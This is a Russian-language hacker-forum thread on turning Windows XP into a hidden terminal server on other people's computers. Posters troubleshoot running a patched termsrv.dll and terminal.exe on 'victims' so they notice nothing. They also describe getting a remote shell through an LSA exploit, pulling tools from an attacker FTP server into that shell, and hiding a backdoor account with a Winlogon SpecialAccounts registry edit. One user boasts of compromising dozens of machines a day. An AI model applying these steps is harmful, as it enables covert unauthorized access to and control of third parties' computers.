Авторские статьи Превращение Win-xp-sp2 в сервер терминалов (или троян от Мелкомягких)

Discussion in 'Статьи' started by -=lebed=-, 21 Mar 2007.

Thread Status:
Not open for further replies.
  1. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    "Разрешить быстрое переключение пользователей"
    - msgbox не должен выскакивать.
    - локально работающий юзер не вываливается из своей сессии. Оба должны работать одновременно!
     
    1 person likes this.
  2. Belfigor

    Belfigor Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    156
    Likes Received:
    40
    Reputations:
    2
    протестил , запустил у жертвы terminal.exe (жертва комп ребутнула ) далее , msgbox вылетает и всё описанное выше :( вот скрины http://slil.ru/25300166
     
  3. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Ты уверен, что замена termsrv.dll прошла успешно и не восстановилась оригинальная версия? Проверь версию либы... Перезагрузку делал?
     
    #23 -=lebed=-, 29 Dec 2007
    Last edited: 29 Dec 2007
  4. Belfigor

    Belfigor Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    156
    Likes Received:
    40
    Reputations:
    2
    Так всё проверил :) , значит из 5 компов , 2 пашут нормально , 3 нет , то есть к двум можно подрубиться без проблем жертва ничего не видеть , а на остальных трёх вылетает сообщение (пытается установить сзязь asdf и тд ) хотя точно знаю , что на тех 3 компах , полностью отключенно восстановление системы , отключен бранмауэр , и CD WINDOWS XP PRO не вставлялся (после запуска terminal.exe) и компы были срузу перезагружены и не один раз :D , вот такие дела , самому уже просто интересно , почему это происходит ..... :rolleyes:
     
  5. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Ещё может зависеть от версии винды. У тебя точно все одинаковые? (XP, SP1, SP2 - разница точно есть) а вот если разные билды, то х.е.з. Ну раз на 2 работает - это уже гуд! А ты на тех на которых не получается посмотри параметр "быстрое перекл. пользователей" в системе...
     
    5 people like this.
  6. Belfigor

    Belfigor Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    156
    Likes Received:
    40
    Reputations:
    2
    2 -=lebed=- у меня проблема в следующем , когда я получаю эксплоитом LSA "сmd " чужого компа , я не могу залить terminal .exe , то есть на дедике это работает !!!
    Ставю себе TYPSoft FTP Server , создаваю свой аккаунт и заливаю
    F:\Documents and Settings\sss>ftp
    ftp> o
    К xx.xxx.xxx.xxx
    Связь с xx.xxx.xxx.xxx
    220 TYPSoft FTP Server 1.10 ready...
    Пользователь (xx.xxx.xxx.xxx:(none)): sss
    331 Password required for sss.
    Пароль:
    230 User sss logged in.
    ftp> dir
    200 Port command successful.
    150 Opening data connection for directory list.
    -rwxrwxrwx 1 ftp ftp 2918400 Dec 20 11:46 fly.exe
    -rwxrwxrwx 1 ftp ftp 349696 Dec 23 12:54 sex.exe
    -rw-rw-rw- 1 ftp ftp 149001 Dec 23 14:00 terminal.exe
    drw-rw-rw- 1 ftp ftp 0 Apr 30 19:00 sss
    226 Transfer complete.
    ftp: 279 байт получено за 0,00 (сек) со скоростью 279000,00 (КБ/сек).
    ftp> Get terminal.exe
    200 Port command successful.
    150 Opening data connection for terminal.exe.
    226 Transfer complete.
    ftp: 149001 байт получено за 0,16 (сек) со скоростью 2227,36 (КБ/сек).

    начинаю заливать через shell , доходит до

    F:\Documents and Settings\sss>ftp
    ftp> o
    К xx.xxx.xxx.xxx
    Связь с xx.xxx.xxx.xxx
    220 TYPSoft FTP Server 1.10 ready...
    Пользователь (xx.xxx.xxx.xxx:(none)): sss
    _

    и затем всё зависает наглухо :(((
    и так на всех компах к которым получил доступ , все службы вырубил net STOP...
    почему это произходит ? будь добр скажи

    зы: на хакер часть постов в этом топике почикали (мол ФЛУД) и вообще отношение модеров оставляет желать лучшего http://forum.xakep.ru/m_1033948/mpage_2/key_/tm.htm#1044503
     
  7. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Оффтоп (неудержался):
    Ого, я на ][ легенда уже ... ГЫ!
    Мдя...

    По сабжу:
    1. Если ты "имеешь" систему сплоитом LSA - то это явно не XP SP2, а SP1 или просто XP
    2. А если это не SP2 то мой файлик с настройками реестра может и не подойти. Надо попробовать всё сделать самому вручную на SP1, так как возможны ньюансы (я сам на SP1 и ниже не тестил...)
    P.S. Жаль потерянного времени на ][...
     
    #27 -=lebed=-, 1 Jan 2008
    Last edited: 1 Jan 2008
    1 person likes this.
  8. Belfigor

    Belfigor Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    156
    Likes Received:
    40
    Reputations:
    2
    да ты прав , все тачки XP HOME , но больше интересует вот это факт
    вообще не только твой файлик не заливается и другие тоже :(( уже сегодня не только через дедик проверил (через делик заливается ) к другу пришёл подрубился через его cmd к своему ftp и всё залили что было нужно к нему (затем удалил конечно :) пробую через shell , не фига (см выше) :rolleyes:
     
    #28 Belfigor, 1 Jan 2008
    Last edited: 1 Jan 2008
  9. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Не зависает! вводи пароль! в консоли ничего не будет отображаться (даже курсор).

    P.S. Попробуй локально через cmd зайти на свой TYPSoft FTP Server 1.10, заходит? Имхо уже пошёл оффтоп..."Особенности работы клиента ftp через удалённый cmd-шелл"
     
    #29 -=lebed=-, 1 Jan 2008
    Last edited: 1 Jan 2008
  10. Belfigor

    Belfigor Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    156
    Likes Received:
    40
    Reputations:
    2
    Да вот именно ввожу пароль и всё зависает и весит глухо , локально захожу через cmd на свой TYPSoft без проблем , а через shell жерты ,после ввода пароля всё виснет и весит :confused: сорри за оффтоп
     
    #30 Belfigor, 1 Jan 2008
    Last edited: 1 Jan 2008
  11. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    а локально заходит? попробуй другой FTP демон, я пользовался FTP Server by Pablo Software Solutions Version 1.52 - работало...

    ЗЫ имхо проблема с установлением соединения по ftp с твоим компом (NAT, фаер...)
     
  12. onikishov

    onikishov Elder - Старейшина

    Joined:
    25 Mar 2007
    Messages:
    142
    Likes Received:
    74
    Reputations:
    0
    Лебедь, будет обновление твоего релиза?
    ->Вряд-ли, а чем тот не устраивает?
     
    #32 onikishov, 16 Feb 2008
    Last edited by a moderator: 16 Feb 2008
  13. onikishov

    onikishov Elder - Старейшина

    Joined:
    25 Mar 2007
    Messages:
    142
    Likes Received:
    74
    Reputations:
    0
    Это типо наезд? :D
    Интересно, может Вы куда-то дальше продвинулись.
    Вы ж словами просто так не кидаетесь?
    руки не дошли до этого в своё время, а щас лень этим заниматься...
    Кто? если не ты сам? (с) Elekt
     
    #33 onikishov, 16 Feb 2008
    Last edited by a moderator: 17 Feb 2008
  14. Ru}{eeZ

    Ru}{eeZ Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    454
    Likes Received:
    73
    Reputations:
    -5
    У кого не скрывается пользователь меняем:
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]
    "asdf"=dword:00000000

    на

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
    "asdf"=dword:00000000
     
  15. AHTOLLlKA

    AHTOLLlKA Member

    Joined:
    1 Feb 2005
    Messages:
    225
    Likes Received:
    35
    Reputations:
    22
    блин... мож я че не догнал.... строки веть идентичны оО


    а статья отличная просто
     
  16. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    Тут soft_all.zip там ещё несколько файлов нужных для работы ;)
     
  17. Richard

    Richard Member

    Joined:
    2 Dec 2008
    Messages:
    42
    Likes Received:
    7
    Reputations:
    1
    Автору зачёт! очень интересная статья
     
  18. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    Не то слово интересная , статья высшая , год назад вообще дедики по 38 штук в сутки делал :)
     
  19. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    сайт жив, скорее всего проблемы у самого юкоза были...
     
  20. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Да, но потребуется перезагрузка и вероятность что сработает ~33% потому как он собран под конкретную сборку винды, на других может и не прокатить...
     
    2 people like this.
Thread Status:
Not open for further replies.